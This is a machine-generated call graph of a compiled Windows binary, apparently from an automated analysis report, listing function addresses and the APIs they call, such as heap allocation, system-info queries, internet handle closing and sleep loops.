547870 RtlAllocateHeap 14219->14220 14221 542ed1 14220->14221 14222 535b20 RtlAllocateHeap 14221->14222 14223 542edc 14222->14223 14224 547f30 RtlAllocateHeap 14223->14224 14225 542f1f 14224->14225 14226 547870 RtlAllocateHeap 14225->14226 14227 54326c __cftof 14226->14227 14228 5432f2 InternetCloseHandle InternetCloseHandle 14227->14228 14229 543331 14228->14229 14230 547870 RtlAllocateHeap 14229->14230 14231 5433c4 14230->14231 14232 535b20 RtlAllocateHeap 14231->14232 14233 5433cb 14232->14233 14234 547870 RtlAllocateHeap 14233->14234 14235 5433de 14234->14235 14236 547870 RtlAllocateHeap 14235->14236 14237 5433f3 14236->14237 14238 547870 RtlAllocateHeap 14237->14238 14239 543408 14238->14239 14240 547870 RtlAllocateHeap 14239->14240 14241 54341a 14240->14241 14242 53e440 6 API calls 14241->14242 14244 543423 14242->14244 14243 54351a __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14244->14243 14245 547f30 RtlAllocateHeap 14244->14245 14246 5435c0 14245->14246 14247 547f30 RtlAllocateHeap 14246->14247 14248 54360f 14247->14248 14249 547f30 RtlAllocateHeap 14248->14249 14250 543653 14249->14250 14251 547f30 RtlAllocateHeap 14250->14251 14252 543695 14251->14252 14253 547870 RtlAllocateHeap 14252->14253 14254 5436a8 14253->14254 14255 535b20 RtlAllocateHeap 14254->14255 14256 5436b3 14255->14256 14257 547f30 RtlAllocateHeap 14256->14257 14259 543721 shared_ptr 14257->14259 14273 539820 14259->14273 14260 543782 14261 547870 RtlAllocateHeap 14260->14261 14262 543799 14261->14262 14263 535b20 RtlAllocateHeap 14262->14263 14264 5437a4 14263->14264 14265 547f30 RtlAllocateHeap 14264->14265 14266 5437ec 14265->14266 14267 548070 RtlAllocateHeap 14266->14267 14268 544250 14267->14268 14269 54c0c9 std::_Xinvalid_argument RtlAllocateHeap 14268->14269 14270 544264 14269->14270 14271 54c109 RtlAllocateHeap 14270->14271 14272 544273 14271->14272 14274 547870 RtlAllocateHeap 14273->14274 14275 53984e 14274->14275 14276 535b20 RtlAllocateHeap 14275->14276 14277 539857 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr __cftof 14276->14277 14277->14260 14288 546ae0 14289 546b10 14288->14289 14290 547870 RtlAllocateHeap 14289->14290 14291 535b20 RtlAllocateHeap 14289->14291 14294 5446c0 14289->14294 14290->14289 14291->14289 14293 546b5c Sleep 14293->14289 14295 5446fb 14294->14295 14405 544d80 shared_ptr 14294->14405 14297 547870 RtlAllocateHeap 14295->14297 14295->14405 14296 544e69 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14296->14293 14298 54471c 14297->14298 14299 535b20 RtlAllocateHeap 14298->14299 14300 544723 14299->14300 14302 547870 RtlAllocateHeap 14300->14302 14304 544735 14302->14304 14303 544f25 14593 536920 14303->14593 14306 547870 RtlAllocateHeap 14304->14306 14307 544747 14306->14307 14308 53bd60 6 API calls 14307->14308 14309 544753 14308->14309 14313 547870 RtlAllocateHeap 14309->14313 14310 544fee shared_ptr 14603 537d00 14310->14603 14312 544f35 shared_ptr 14312->14310 14334 546ab6 14312->14334 14315 544768 14313->14315 14314 544ffd 14668 534570 14314->14668 14317 547870 RtlAllocateHeap 14315->14317 14319 544780 14317->14319 14318 54500a 14672 5382b0 14318->14672 14321 535b20 RtlAllocateHeap 14319->14321 14323 544787 14321->14323 14322 545016 14324 534570 RtlAllocateHeap 14322->14324 14326 5384b0 RtlAllocateHeap 14323->14326 14328 545023 14324->14328 14325 547870 RtlAllocateHeap 14325->14334 14327 544793 14326->14327 14329 547870 RtlAllocateHeap 14327->14329 14413 544a0d 14327->14413 14333 534570 RtlAllocateHeap 14328->14333 14331 5447af 14329->14331 14330 547870 RtlAllocateHeap 14332 544a3f 14330->14332 14335 547870 RtlAllocateHeap 14331->14335 14336 547870 RtlAllocateHeap 14332->14336 14337 545040 14333->14337 14334->14325 14338 535b20 RtlAllocateHeap 14334->14338 14346 5446c0 11 API calls 14334->14346 14339 5447c7 14335->14339 14340 544a54 14336->14340 14341 547870 RtlAllocateHeap 14337->14341 14338->14334 14343 535b20 RtlAllocateHeap 14339->14343 14344 547870 RtlAllocateHeap 14340->14344 14342 54505e 14341->14342 14345 535b20 RtlAllocateHeap 14342->14345 14347 5447ce 14343->14347 14348 544a66 14344->14348 14349 545065 14345->14349 14350 546b5c Sleep 14346->14350 14351 5384b0 RtlAllocateHeap 14347->14351 14352 53bd60 6 API calls 14348->14352 14353 547870 RtlAllocateHeap 14349->14353 14350->14334 14354 5447da 14351->14354 14355 544a72 14352->14355 14356 54507a 14353->14356 14359 547870 RtlAllocateHeap 14354->14359 14354->14413 14357 547870 RtlAllocateHeap 14355->14357 14358 535b20 RtlAllocateHeap 14356->14358 14360 544a87 14357->14360 14368 545081 14358->14368 14361 5447f7 14359->14361 14362 547870 RtlAllocateHeap 14360->14362 14363 535b20 RtlAllocateHeap 14361->14363 14364 544a9f 14362->14364 14370 5447ff 14363->14370 14365 535b20 RtlAllocateHeap 14364->14365 14366 544aa6 14365->14366 14367 5384b0 RtlAllocateHeap 14366->14367 14369 544ab2 14367->14369 14373 547f30 RtlAllocateHeap 14368->14373 14371 547870 RtlAllocateHeap 14369->14371 14369->14405 14372 547f30 RtlAllocateHeap 14370->14372 14374 544ace 14371->14374 14382 544869 shared_ptr 14372->14382 14379 5450fd 14373->14379 14375 547870 RtlAllocateHeap 14374->14375 14376 544ae6 14375->14376 14378 535b20 RtlAllocateHeap 14376->14378 14377 547870 RtlAllocateHeap 14380 5448f6 14377->14380 14381 544aed 14378->14381 14383 547c50 RtlAllocateHeap 14379->14383 14384 535b20 RtlAllocateHeap 14380->14384 14385 5384b0 RtlAllocateHeap 14381->14385 14382->14377 14386 545169 14383->14386 14390 5448fe 14384->14390 14387 544af9 14385->14387 14388 548090 RtlAllocateHeap 14386->14388 14389 547870 RtlAllocateHeap 14387->14389 14387->14405 14394 5451a5 shared_ptr 14388->14394 14391 544b16 14389->14391 14392 547f30 RtlAllocateHeap 14390->14392 14393 535b20 RtlAllocateHeap 14391->14393 14395 544959 shared_ptr 14392->14395 14396 544b1e 14393->14396 14400 547f30 RtlAllocateHeap 14394->14400 14399 539820 RtlAllocateHeap 14395->14399 14395->14413 14397 544ea7 14396->14397 14398 544b6a 14396->14398 14401 548070 RtlAllocateHeap 14397->14401 14402 547f30 RtlAllocateHeap 14398->14402 14406 5449e5 __dosmaperr 14399->14406 14411 54526d shared_ptr 14400->14411 14403 544eac 14401->14403 14409 544b88 shared_ptr 14402->14409 14404 54c109 RtlAllocateHeap 14403->14404 14404->14405 14405->14296 14571 5365b0 14405->14571 14408 568979 3 API calls 14406->14408 14406->14413 14407 547870 RtlAllocateHeap 14410 544c15 14407->14410 14408->14413 14409->14405 14409->14407 14414 535b20 RtlAllocateHeap 14410->14414 14412 534570 RtlAllocateHeap 14411->14412 14415 54530d 14412->14415 14413->14330 14413->14403 14420 544c1d 14414->14420 14416 547870 RtlAllocateHeap 14415->14416 14417 545327 14416->14417 14418 535b20 RtlAllocateHeap 14417->14418 14419 545332 14418->14419 14421 534570 RtlAllocateHeap 14419->14421 14422 547f30 RtlAllocateHeap 14420->14422 14423 545347 14421->14423 14428 544c78 shared_ptr 14422->14428 14424 547870 RtlAllocateHeap 14423->14424 14425 54535b 14424->14425 14426 535b20 RtlAllocateHeap 14425->14426 14429 545366 14426->14429 14427 547870 RtlAllocateHeap 14430 544d07 14427->14430 14428->14405 14428->14427 14431 547870 RtlAllocateHeap 14429->14431 14432 547870 RtlAllocateHeap 14430->14432 14433 545384 14431->14433 14434 544d1c 14432->14434 14435 535b20 RtlAllocateHeap 14433->14435 14436 547870 RtlAllocateHeap 14434->14436 14437 54538f 14435->14437 14438 544d37 14436->14438 14440 547870 RtlAllocateHeap 14437->14440 14439 535b20 RtlAllocateHeap 14438->14439 14441 544d3e 14439->14441 14442 5453ad 14440->14442 14446 547f30 RtlAllocateHeap 14441->14446 14443 535b20 RtlAllocateHeap 14442->14443 14444 5453b8 14443->14444 14445 547870 RtlAllocateHeap 14444->14445 14447 5453d6 14445->14447 14448 544d77 14446->14448 14449 535b20 RtlAllocateHeap 14447->14449 14553 5442a0 14448->14553 14451 5453e1 14449->14451 14452 547870 RtlAllocateHeap 14451->14452 14453 5453ff 14452->14453 14454 535b20 RtlAllocateHeap 14453->14454 14455 54540a 14454->14455 14456 547870 RtlAllocateHeap 14455->14456 14457 545428 14456->14457 14458 535b20 RtlAllocateHeap 14457->14458 14459 545433 14458->14459 14460 547870 RtlAllocateHeap 14459->14460 14461 545451 14460->14461 14462 535b20 RtlAllocateHeap 14461->14462 14463 54545c 14462->14463 14464 547870 RtlAllocateHeap 14463->14464 14465 54547a 14464->14465 14466 535b20 RtlAllocateHeap 14465->14466 14467 545485 14466->14467 14468 547870 RtlAllocateHeap 14467->14468 14469 5454a1 14468->14469 14470 535b20 RtlAllocateHeap 14469->14470 14471 5454ac 14470->14471 14472 547870 RtlAllocateHeap 14471->14472 14473 5454c3 14472->14473 14474 535b20 RtlAllocateHeap 14473->14474 14475 5454ce 14474->14475 14476 547870 RtlAllocateHeap 14475->14476 14477 5454e5 14476->14477 14478 535b20 RtlAllocateHeap 14477->14478 14479 5454f0 14478->14479 14480 547870 RtlAllocateHeap 14479->14480 14481 54550c 14480->14481 14482 535b20 RtlAllocateHeap 14481->14482 14483 545517 14482->14483 14484 548250 RtlAllocateHeap 14483->14484 14485 54552b 14484->14485 14486 548150 RtlAllocateHeap 14485->14486 14487 54553f 14486->14487 14488 548150 RtlAllocateHeap 14487->14488 14489 545553 14488->14489 14490 548150 RtlAllocateHeap 14489->14490 14491 545567 14490->14491 14492 548250 RtlAllocateHeap 14491->14492 14493 54557b 14492->14493 14494 548150 RtlAllocateHeap 14493->14494 14495 54558f 14494->14495 14496 548250 RtlAllocateHeap 14495->14496 14497 5455a3 14496->14497 14498 548150 RtlAllocateHeap 14497->14498 14499 5455b7 14498->14499 14500 548250 RtlAllocateHeap 14499->14500 14501 5455cb 14500->14501 14502 548150 RtlAllocateHeap 14501->14502 14503 5455df 14502->14503 14504 548250 RtlAllocateHeap 14503->14504 14505 5455f3 14504->14505 14506 548150 RtlAllocateHeap 14505->14506 14507 545607 14506->14507 14508 548250 RtlAllocateHeap 14507->14508 14509 54561b 14508->14509 14510 548150 RtlAllocateHeap 14509->14510 14511 54562f 14510->14511 14512 548250 RtlAllocateHeap 14511->14512 14513 545643 14512->14513 14514 548150 RtlAllocateHeap 14513->14514 14515 545657 14514->14515 14516 548250 RtlAllocateHeap 14515->14516 14517 54566b 14516->14517 14518 548150 RtlAllocateHeap 14517->14518 14519 54567f 14518->14519 14520 548250 RtlAllocateHeap 14519->14520 14521 545693 14520->14521 14522 548150 RtlAllocateHeap 14521->14522 14523 5456a7 14522->14523 14524 548150 RtlAllocateHeap 14523->14524 14525 5456bb 14524->14525 14526 548150 RtlAllocateHeap 14525->14526 14527 5456cf 14526->14527 14528 548250 RtlAllocateHeap 14527->14528 14529 5456e3 shared_ptr 14528->14529 14530 546377 14529->14530 14531 5464cb 14529->14531 14533 547870 RtlAllocateHeap 14530->14533 14532 547870 RtlAllocateHeap 14531->14532 14534 5464e0 14532->14534 14535 54638d 14533->14535 14536 547870 RtlAllocateHeap 14534->14536 14537 535b20 RtlAllocateHeap 14535->14537 14538 5464f5 14536->14538 14539 546398 14537->14539 14684 534960 14538->14684 14540 548250 RtlAllocateHeap 14539->14540 14552 5463ac __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14540->14552 14542 546504 14543 5475d0 RtlAllocateHeap 14542->14543 14549 54654b 14543->14549 14544 546646 14545 547870 RtlAllocateHeap 14544->14545 14546 54665c 14545->14546 14548 535b20 RtlAllocateHeap 14546->14548 14547 548bd0 RtlAllocateHeap 14547->14549 14550 546667 14548->14550 14549->14544 14549->14547 14551 548150 RtlAllocateHeap 14550->14551 14551->14552 14552->14293 14554 547870 RtlAllocateHeap 14553->14554 14555 5442e2 14554->14555 14556 547870 RtlAllocateHeap 14555->14556 14557 5442f4 14556->14557 14558 5384b0 RtlAllocateHeap 14557->14558 14559 5442fd 14558->14559 14560 544556 14559->14560 14570 544308 shared_ptr 14559->14570 14561 547870 RtlAllocateHeap 14560->14561 14562 544567 14561->14562 14563 547870 RtlAllocateHeap 14562->14563 14564 54457c 14563->14564 14566 547870 RtlAllocateHeap 14564->14566 14565 547f30 RtlAllocateHeap 14565->14570 14567 544520 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14566->14567 14567->14405 14568 5491b0 RtlAllocateHeap 14568->14570 14569 547870 RtlAllocateHeap 14569->14570 14570->14565 14570->14567 14570->14568 14570->14569 14572 53660f 14571->14572 14573 547870 RtlAllocateHeap 14572->14573 14574 536676 14573->14574 14575 535b20 RtlAllocateHeap 14574->14575 14576 536681 14575->14576 14691 532280 14576->14691 14578 536699 shared_ptr 14579 547870 RtlAllocateHeap 14578->14579 14590 5368b3 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14578->14590 14580 536702 14579->14580 14581 535b20 RtlAllocateHeap 14580->14581 14582 53670d 14581->14582 14583 532280 3 API calls 14582->14583 14592 536727 shared_ptr 14583->14592 14584 536822 14585 547f30 RtlAllocateHeap 14584->14585 14587 53686c 14585->14587 14586 547870 RtlAllocateHeap 14586->14592 14588 547f30 RtlAllocateHeap 14587->14588 14588->14590 14589 535b20 RtlAllocateHeap 14589->14592 14590->14303 14591 532280 3 API calls 14591->14592 14592->14584 14592->14586 14592->14589 14592->14590 14592->14591 14594 536c71 14593->14594 14601 536998 shared_ptr 14593->14601 14595 536d33 14594->14595 14596 536c94 14594->14596 14598 548070 RtlAllocateHeap 14595->14598 14597 547f30 RtlAllocateHeap 14596->14597 14599 536cb3 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14597->14599 14598->14599 14599->14312 14600 547f30 RtlAllocateHeap 14600->14601 14601->14594 14601->14595 14601->14599 14601->14600 14602 5491b0 RtlAllocateHeap 14601->14602 14602->14601 14604 537d66 __cftof 14603->14604 14605 547870 RtlAllocateHeap 14604->14605 14614 537eb8 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14604->14614 14606 537d97 14605->14606 14607 535b20 RtlAllocateHeap 14606->14607 14608 537da2 14607->14608 14609 547870 RtlAllocateHeap 14608->14609 14610 537dc4 14609->14610 14611 535b20 RtlAllocateHeap 14610->14611 14613 537dcf shared_ptr 14611->14613 14612 537ea3 GetNativeSystemInfo 14615 537ea7 14612->14615 14613->14612 14613->14614 14613->14615 14614->14314 14615->14614 14616 537fe9 14615->14616 14617 537f0f 14615->14617 14619 547870 RtlAllocateHeap 14616->14619 14618 547870 RtlAllocateHeap 14617->14618 14620 537f30 14618->14620 14621 538015 14619->14621 14622 535b20 RtlAllocateHeap 14620->14622 14623 535b20 RtlAllocateHeap 14621->14623 14624 537f37 14622->14624 14625 53801c 14623->14625 14626 547870 RtlAllocateHeap 14624->14626 14627 547870 RtlAllocateHeap 14625->14627 14628 537f4f 14626->14628 14629 538034 14627->14629 14630 535b20 RtlAllocateHeap 14628->14630 14631 535b20 RtlAllocateHeap 14629->14631 14634 537f56 14630->14634 14632 53803b 14631->14632 14633 547870 RtlAllocateHeap 14632->14633 14635 53806c 14633->14635 14813 568a81 14634->14813 14637 535b20 RtlAllocateHeap 14635->14637 14638 538073 14637->14638 14639 535640 RtlAllocateHeap 14638->14639 14640 538082 14639->14640 14641 547870 RtlAllocateHeap 14640->14641 14642 5380bd 14641->14642 14643 535b20 RtlAllocateHeap 14642->14643 14644 5380c4 14643->14644 14645 547870 RtlAllocateHeap 14644->14645 14646 5380dc 14645->14646 14647 535b20 RtlAllocateHeap 14646->14647 14648 5380e3 14647->14648 14649 547870 RtlAllocateHeap 14648->14649 14650 538114 14649->14650 14651 535b20 RtlAllocateHeap 14650->14651 14652 53811b 14651->14652 14653 535640 RtlAllocateHeap 14652->14653 14654 53812a 14653->14654 14655 547870 RtlAllocateHeap 14654->14655 14656 538165 14655->14656 14657 535b20 RtlAllocateHeap 14656->14657 14658 53816c 14657->14658 14659 547870 RtlAllocateHeap 14658->14659 14660 538184 14659->14660 14661 535b20 RtlAllocateHeap 14660->14661 14662 53818b 14661->14662 14663 547870 RtlAllocateHeap 14662->14663 14664 5381bc 14663->14664 14665 535b20 RtlAllocateHeap 14664->14665 14666 5381c3 14665->14666 14667 535640 RtlAllocateHeap 14666->14667 14667->14614 14669 534594 14668->14669 14669->14669 14670 547f30 RtlAllocateHeap 14669->14670 14671 534607 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14669->14671 14670->14671 14671->14318 14673 538315 __cftof 14672->14673 14674 547870 RtlAllocateHeap 14673->14674 14677 538333 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14673->14677 14675 53834c 14674->14675 14676 535b20 RtlAllocateHeap 14675->14676 14678 538357 14676->14678 14677->14322 14679 547870 RtlAllocateHeap 14678->14679 14680 538379 14679->14680 14681 535b20 RtlAllocateHeap 14680->14681 14683 538384 shared_ptr 14681->14683 14682 538454 GetNativeSystemInfo 14682->14677 14683->14677 14683->14682 14685 547f30 RtlAllocateHeap 14684->14685 14686 5349b3 14685->14686 14687 547f30 RtlAllocateHeap 14686->14687 14688 5349cc 14687->14688 14816 534650 14688->14816 14690 534a59 shared_ptr 14690->14542 14694 532240 14691->14694 14695 532256 14694->14695 14698 568667 14695->14698 14701 567456 14698->14701 14700 532264 14700->14578 14702 567496 14701->14702 14706 56747e __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z __dosmaperr ___std_exception_copy 14701->14706 14703 56683a __fassign 3 API calls 14702->14703 14702->14706 14704 5674ae 14703->14704 14707 567a11 14704->14707 14706->14700 14708 567a22 14707->14708 14709 567a31 __dosmaperr ___std_exception_copy 14708->14709 14714 567fb5 14708->14714 14719 567c0f 14708->14719 14724 567c35 14708->14724 14745 567d83 14708->14745 14709->14706 14715 567fc5 14714->14715 14716 567fbe 14714->14716 14715->14708 14764 56799d 14716->14764 14718 567fc4 14718->14708 14720 567c1f 14719->14720 14721 567c18 14719->14721 14720->14708 14722 56799d 3 API calls 14721->14722 14723 567c1e 14722->14723 14723->14708 14725 567c3c 14724->14725 14731 567c56 __dosmaperr ___std_exception_copy 14724->14731 14726 567d9c 14725->14726 14727 567e08 14725->14727 14725->14731 14728 567ddf 14726->14728 14734 567da8 14726->14734 14727->14728 14729 567e4e 14727->14729 14730 567e0f 14727->14730 14743 567dc4 14728->14743 14744 567dd8 14728->14744 14776 56826d 14728->14776 14786 568451 14729->14786 14732 567e14 14730->14732 14739 567db6 14730->14739 14731->14708 14732->14728 14738 567e19 14732->14738 14737 567def 14734->14737 14734->14739 14734->14743 14737->14744 14768 5681dd 14737->14768 14738->14743 14738->14744 14772 568432 14738->14772 14739->14743 14739->14744 14780 56808e 14739->14780 14743->14744 14789 568537 14743->14789 14744->14708 14746 567d9c 14745->14746 14747 567e08 14745->14747 14752 567ddf 14746->14752 14753 567da8 14746->14753 14748 567e4e 14747->14748 14749 567e0f 14747->14749 14747->14752 14751 568451 RtlAllocateHeap 14748->14751 14750 567e14 14749->14750 14759 567db6 14749->14759 14750->14752 14757 567e19 14750->14757 14761 567dc4 14751->14761 14754 56826d RtlAllocateHeap 14752->14754 14752->14761 14763 567dd8 14752->14763 14756 567def 14753->14756 14753->14759 14753->14761 14754->14761 14755 56808e 3 API calls 14755->14761 14758 5681dd 3 API calls 14756->14758 14756->14763 14760 568432 RtlAllocateHeap 14757->14760 14757->14761 14757->14763 14758->14761 14759->14755 14759->14761 14759->14763 14760->14761 14762 568537 3 API calls 14761->14762 14761->14763 14762->14763 14763->14708 14765 5679af __dosmaperr 14764->14765 14766 568979 3 API calls 14765->14766 14767 5679d2 __dosmaperr 14766->14767 14767->14718 14769 5681f8 14768->14769 14770 56822a 14769->14770 14793 56c65f 14769->14793 14770->14743 14773 56843e 14772->14773 14774 56826d RtlAllocateHeap 14773->14774 14775 568450 14774->14775 14775->14743 14777 568280 14776->14777 14779 56829b __dosmaperr ___std_exception_copy 14777->14779 14796 5675ec 14777->14796 14779->14743 14781 5680a7 14780->14781 14782 5675ec RtlAllocateHeap 14781->14782 14783 5680e4 14782->14783 14800 56d199 14783->14800 14785 56815a 14785->14743 14785->14785 14787 56826d RtlAllocateHeap 14786->14787 14788 568468 14787->14788 14788->14743 14790 5685aa __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14789->14790 14792 568554 14789->14792 14790->14744 14791 56c65f __cftof 3 API calls 14791->14792 14792->14790 14792->14791 14794 56c504 __cftof GetPEB GetPEB RtlAllocateHeap 14793->14794 14795 56c677 14794->14795 14795->14770 14797 567610 14796->14797 14799 567601 __dosmaperr ___free_lconv_mon 14796->14799 14798 56af0b __fassign RtlAllocateHeap 14797->14798 14797->14799 14798->14799 14799->14779 14801 56d1a9 __dosmaperr ___std_exception_copy 14800->14801 14803 56d1bf 14800->14803 14801->14785 14802 56d256 14806 56d2b5 14802->14806 14807 56d27f 14802->14807 14803->14801 14803->14802 14804 56d25b 14803->14804 14805 56c9b0 GetPEB GetPEB RtlAllocateHeap 14804->14805 14805->14801 14808 56ccc9 GetPEB GetPEB RtlAllocateHeap 14806->14808 14809 56d284 14807->14809 14810 56d29d 14807->14810 14808->14801 14811 56d00f GetPEB GetPEB RtlAllocateHeap 14809->14811 14812 56ceb3 GetPEB GetPEB RtlAllocateHeap 14810->14812 14811->14801 14812->14801 14814 5686d7 3 API calls 14813->14814 14815 568a9f 14814->14815 14815->14614 14817 547f30 RtlAllocateHeap 14816->14817 14824 5346c7 shared_ptr 14817->14824 14818 534936 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14818->14690 14819 547f30 RtlAllocateHeap 14823 534806 shared_ptr 14819->14823 14820 547f30 RtlAllocateHeap 14820->14824 14821 548e70 RtlAllocateHeap 14821->14823 14822 548e70 RtlAllocateHeap 14822->14824 14823->14818 14823->14819 14823->14821 14825 534954 14823->14825 14824->14820 14824->14822 14824->14823 14824->14825 14826 547f30 RtlAllocateHeap 14825->14826 14827 5349b3 14826->14827 14828 547f30 RtlAllocateHeap 14827->14828 14829 5349cc 14828->14829 14830 534650 RtlAllocateHeap 14829->14830 14831 534a59 shared_ptr 14830->14831 14831->14690 14862 54a140 14863 54a1c0 14862->14863 14875 547040 14863->14875 14865 54a1fc 14868 54a260 14865->14868 14883 547bc0 14865->14883 14895 533800 14868->14895 14869 54a2ce shared_ptr 14870 54d312 RtlAllocateHeap 14869->14870 14872 54a3ee shared_ptr 14869->14872 14871 54a38e 14870->14871 14903 533ea0 14871->14903 14874 54a3d6 14876 547081 14875->14876 14877 54d312 RtlAllocateHeap 14876->14877 14878 5470a8 14877->14878 14879 54d312 RtlAllocateHeap 14878->14879 14880 5472b6 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14878->14880 14881 54722b __cftof __Mtx_init_in_situ 14879->14881 14880->14865 14909 532e80 14881->14909 14884 547bd2 14883->14884 14885 547c3b 14883->14885 14887 547c0c 14884->14887 14888 547bdd 14884->14888 14886 532440 RtlAllocateHeap 14885->14886 14890 547bea 14886->14890 14889 547c29 14887->14889 14892 54d312 RtlAllocateHeap 14887->14892 14888->14885 14891 547be4 14888->14891 14889->14868 14890->14868 14893 54d312 RtlAllocateHeap 14891->14893 14894 547c16 14892->14894 14893->14890 14894->14868 14896 5338b6 14895->14896 14897 53381f 14895->14897 14896->14869 14897->14896 14899 53388d shared_ptr 14897->14899 14902 5338db 14897->14902 14898 549110 RtlAllocateHeap 14900 5338e5 14898->14900 14901 547bc0 RtlAllocateHeap 14899->14901 14900->14869 14901->14896 14902->14898 14904 533f08 14903->14904 14906 533ede 14903->14906 14905 533f18 14904->14905 14954 532bc0 14904->14954 14905->14874 14906->14874 14910 532ec6 14909->14910 14914 532f2f 14909->14914 14911 54c5dc GetSystemTimePreciseAsFileTime 14910->14911 14912 532ed2 14911->14912 14915 532fde 14912->14915 14916 532edd 14912->14916 14913 532faf 14913->14880 14914->14913 14922 54c5dc GetSystemTimePreciseAsFileTime 14914->14922 14917 54c19a 10 API calls 14915->14917 14919 54d312 RtlAllocateHeap 14916->14919 14921 532ef0 __Mtx_unlock 14916->14921 14918 532fe4 14917->14918 14920 54c19a 10 API calls 14918->14920 14919->14921 14923 532f79 14920->14923 14921->14914 14921->14918 14922->14923 14924 54c19a 10 API calls 14923->14924 14925 532f80 __Mtx_unlock 14923->14925 14924->14925 14926 54c19a 10 API calls 14925->14926 14927 532f98 __Cnd_broadcast 14925->14927 14926->14927 14927->14913 14928 54c19a 10 API calls 14927->14928 14929 532ffc 14928->14929 14930 54c5dc GetSystemTimePreciseAsFileTime 14929->14930 14940 533040 shared_ptr __Mtx_unlock 14930->14940 14931 533185 14932 54c19a 10 API calls 14931->14932 14933 53318b 14932->14933 14934 54c19a 10 API calls 14933->14934 14935 533191 14934->14935 14936 54c19a 10 API calls 14935->14936 14942 533153 __Mtx_unlock 14936->14942 14937 533167 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14937->14880 14938 54c19a 10 API calls 14939 53319d 14938->14939 14940->14931 14940->14933 14940->14937 14941 54c5dc GetSystemTimePreciseAsFileTime 14940->14941 14943 53311f 14941->14943 14942->14937 14942->14938 14943->14931 14943->14935 14943->14942 14945 54bc7c 14943->14945 14948 54baa2 14945->14948 14947 54bc8c 14947->14943 14949 54bacc 14948->14949 14950 54ce9b _xtime_get GetSystemTimePreciseAsFileTime 14949->14950 14951 54bad4 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z __Xtime_diff_to_millis2 14949->14951 14952 54baff __Xtime_diff_to_millis2 14950->14952 14951->14947 14952->14951 14953 54ce9b _xtime_get GetSystemTimePreciseAsFileTime 14952->14953 14953->14951 14955 54d312 RtlAllocateHeap 14954->14955 14956 532bce 14955->14956 14964 54b777 14956->14964 14958 532c02 14959 532c09 14958->14959 14970 532c40 14958->14970 14959->14874 14961 532c18 14973 532520 14961->14973 14963 532c25 std::_Throw_future_error 14965 54b784 14964->14965 14968 54b7a3 Concurrency::details::_Reschedule_chore 14964->14968 14976 54caa7 14965->14976 14967 54b794 14967->14968 14978 54b74e 14967->14978 14968->14958 14984 54b72b 14970->14984 14972 532c72 shared_ptr 14972->14961 14974 5637dc ___std_exception_copy RtlAllocateHeap 14973->14974 14975 532557 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14974->14975 14975->14963 14977 54cac2 CreateThreadpoolWork 14976->14977 14977->14967 14979 54b757 Concurrency::details::_Reschedule_chore 14978->14979 14982 54ccfc 14979->14982 14981 54b771 14981->14968 14983 54cd11 TpPostWork 14982->14983 14983->14981 14985 54b737 14984->14985 14986 54b747 14984->14986 14985->14986 14988 54c9a8 14985->14988 14986->14972 14989 54c9bd TpReleaseWork 14988->14989 14989->14986 14996 548700 14997 54d312 RtlAllocateHeap 14996->14997 14998 54875a __cftof 14997->14998 15006 549ae0 14998->15006 15000 548784 15001 54879c __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 15000->15001 15010 5343b0 15000->15010 15005 54880f 15007 549b15 15006->15007 15019 532ca0 15007->15019 15009 549b46 15009->15000 15011 54be0f InitOnceExecuteOnce 15010->15011 15012 5343ca 15011->15012 15013 5343d1 15012->15013 15014 566beb 9 API calls 15012->15014 15016 54bd80 15013->15016 15015 5343e4 15014->15015 15073 54bcbb 15016->15073 15018 54bd96 std::_Throw_future_error 15018->15005 15020 532cdd 15019->15020 15021 54be0f InitOnceExecuteOnce 15020->15021 15022 532d06 15021->15022 15023 532d11 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 15022->15023 15024 532d48 15022->15024 15028 54be27 15022->15028 15023->15009 15037 532400 15024->15037 15029 54be33 15028->15029 15040 5328c0 15029->15040 15031 54be53 std::_Throw_future_error 15032 54bea3 15031->15032 15033 54be9a 15031->15033 15035 532aa0 10 API calls 15032->15035 15048 54bdaf 15033->15048 15036 54be9f 15035->15036 15036->15024 15068 54b506 15037->15068 15039 532432 15041 547f30 RtlAllocateHeap 15040->15041 15042 53290f 15041->15042 15043 532670 RtlAllocateHeap 15042->15043 15045 532927 15043->15045 15044 53294d shared_ptr 15044->15031 15045->15044 15046 5637dc ___std_exception_copy RtlAllocateHeap 15045->15046 15047 5329a4 15046->15047 15047->15031 15049 54cb61 InitOnceExecuteOnce 15048->15049 15050 54bdc7 15049->15050 15051 54bdce 15050->15051 15054 566beb 15050->15054 15051->15036 15053 54bdd7 15053->15036 15061 566bf7 __fassign 15054->15061 15055 568aaf __fassign 2 API calls 15056 566c26 15055->15056 15057 566c35 15056->15057 15058 566c43 15056->15058 15059 566c99 9 API calls 15057->15059 15060 5668bd 3 API calls 15058->15060 15062 566c3f 15059->15062 15063 566c5d 15060->15063 15061->15055 15062->15053 15064 56681d RtlAllocateHeap 15063->15064 15065 566c6a 15064->15065 15066 566c99 9 API calls 15065->15066 15067 566c71 ___free_lconv_mon 15065->15067 15066->15067 15067->15053 15069 54b521 std::_Throw_future_error 15068->15069 15070 568aaf __fassign 2 API calls 15069->15070 15072 54b588 